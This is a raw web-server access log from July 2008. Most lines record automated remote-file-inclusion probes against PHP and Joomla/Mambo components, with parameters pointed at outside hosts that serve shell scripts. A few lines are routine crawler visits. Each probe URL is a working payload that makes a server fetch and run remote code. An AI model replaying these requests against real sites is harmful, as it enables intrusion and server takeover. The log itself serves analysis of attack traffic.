75.125.143.162 - - [19/Jul/2008:10:00:13 -0700] "GET /logs//components/com_performs/http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:10:00:13 -0700] "GET //components/com_performs/http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:10:00:15 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:10:00:17 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18477 "-" "libwww-perl/5.805" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:00:27 -0700] "GET /logs/access_080225.log//cart_content.php?cart_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:00:27 -0700] "GET /logs/access_080225.log//popup_window.php?site_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:00:27 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:00:42 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:00:46 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:00:46 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:00:47 -0700] "GET //components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:00:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:00:57 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:00:57 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:00:58 -0700] "GET //components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:01:00 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:01:01 -0700] "GET //components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:01:03 -0700] "GET /logs//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:01:03 -0700] "GET /bikes/CreSTOC07/CreSTOC2007053.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:01:08 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:01:11 -0700] "GET /logs/access_080329.log//cart_content.php?cart_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:01:19 -0700] "GET /logs/access_080329.log//popup_window.php?site_isp_root=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:01:19 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:10:01:21 -0700] "GET //atom.php5?page=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:01:22 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 200 18521 "-" "libwww-perl/5.75" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:01:29 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 200 18497 "-" "libwww-perl/5.65" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:01:52 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]%7Dsafehtml=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:01:52 -0700] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]%7Dsafehtml=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:02:00 -0700] "GET /bikes/CreSTOC07/CreSTOC2007054.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:02:14 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:10:02:18 -0700] "GET //components/com_htmlarea3_xtd-c/popups/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:18 -0700] "GET /logs/access_080313.log//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:21 -0700] "GET /logs/access_080218.log//components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:24 -0700] "GET /logs/access_080218.log//components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.162.68 - - [19/Jul/2008:10:02:25 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.wingsart.ru/gstbook/templates/liscence.txt? HTTP/1.1" 200 18453 "-" "libwww-perl/5.808" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:27 -0700] "GET /logs/access_080218.log//components/com_loudmounth/includes/abbc/abbc.class.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:27 -0700] "GET /logs/access_080313.log//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.162.68 - - [19/Jul/2008:10:02:31 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.wingsart.ru/gstbook/templates/liscence.txt? HTTP/1.1" 200 18453 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.162.68 - - [19/Jul/2008:10:02:31 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.wingsart.ru/gstbook/templates/liscence.txt? HTTP/1.1" 200 18437 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.162.68 - - [19/Jul/2008:10:02:31 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.wingsart.ru/gstbook/templates/liscence.txt? HTTP/1.1" 200 18453 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.162.68 - - [19/Jul/2008:10:02:32 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.wingsart.ru/gstbook/templates/liscence.txt? HTTP/1.1" 200 18453 "-" "libwww-perl/5.808" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:02:32 -0700] "GET /?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:10:02:35 -0700] "GET /logs/access_080315.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:39 -0700] "GET /logs/access_080329.log//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:39 -0700] "GET //components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:40 -0700] "GET /logs//components/com_smf/smf.phphttp://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.108.171 - - [19/Jul/2008:10:02:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.108.171 - - [19/Jul/2008:10:02:41 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0106.jpg HTTP/1.1" 200 9774 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:46 -0700] "GET /logs/access_080329.log//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:46 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:47 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:47 -0700] "GET /logs/access_080218.log//components/com_pccookbook/pccookbook.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:47 -0700] "GET /logs//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:47 -0700] "GET //components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:50 -0700] "GET /logs//components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:02:51 -0700] "GET //components/com_performs/http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:10:02:51 -0700] "GET /logs/access_080329.log//atom.php5?page=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:10:02:51 -0700] "GET /logs//atom.php5?page=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:02:57 -0700] "GET /?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.803" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:03:02 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:03:02 -0700] "GET /bikes/CreSTOC07/CreSTOC2007055.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:03:06 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:03:13 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:03:16 -0700] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:03:16 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:03:21 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
92.51.130.220 - - [19/Jul/2008:10:03:22 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:03:23 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 200 18497 "-" "libwww-perl/5.65" "www.dmulk.com"
92.51.130.220 - - [19/Jul/2008:10:03:23 -0700] "GET /logs//trans/trans.php?trans=eng&page=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:03:26 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:03:32 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:03:33 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:03:34 -0700] "GET /logs/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.79" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:10:03:37 -0700] "GET /logs/access.log/index.php?sayfa=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:03:52 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:03:52 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:03:53 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:10:03:53 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:03:58 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:04:00 -0700] "GET /?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 200 18421 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:10:04:03 -0700] "GET /logs/?mosConfig_absolute_path=http://www.grousetyee.com/jupload/README? HTTP/1.1" 200 56851 "-" "libwww-perl/5.808" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:04:04 -0700] "GET /bikes/CreSTOC07/CreSTOC2007056.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:04:07 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:04:07 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [19/Jul/2008:10:04:07 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:04:08 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:04:10 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18587 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:10:04:10 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:21 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:21 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:21 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:21 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:22 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:22 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:22 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18453 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.186.45.242 - - [19/Jul/2008:10:04:23 -0700] "GET //index.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 18437 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.103.23.40 - - [19/Jul/2008:10:04:26 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.chonil.co.kr/zboard/icon/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.86.116 - - [19/Jul/2008:10:04:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.230.86.116 - - [19/Jul/2008:10:04:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:04:36 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:04:39 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:04:40 -0700] "GET /logs/access_080329.log//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:04:40 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:04:41 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:04:41 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:04:41 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:04:41 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:04:42 -0700] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:04:42 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:10:04:48 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:10:04:52 -0700] "GET /logs/access_080329.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:04:54 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:04:54 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.42 - - [19/Jul/2008:10:04:54 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://damtare.nm.ru/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
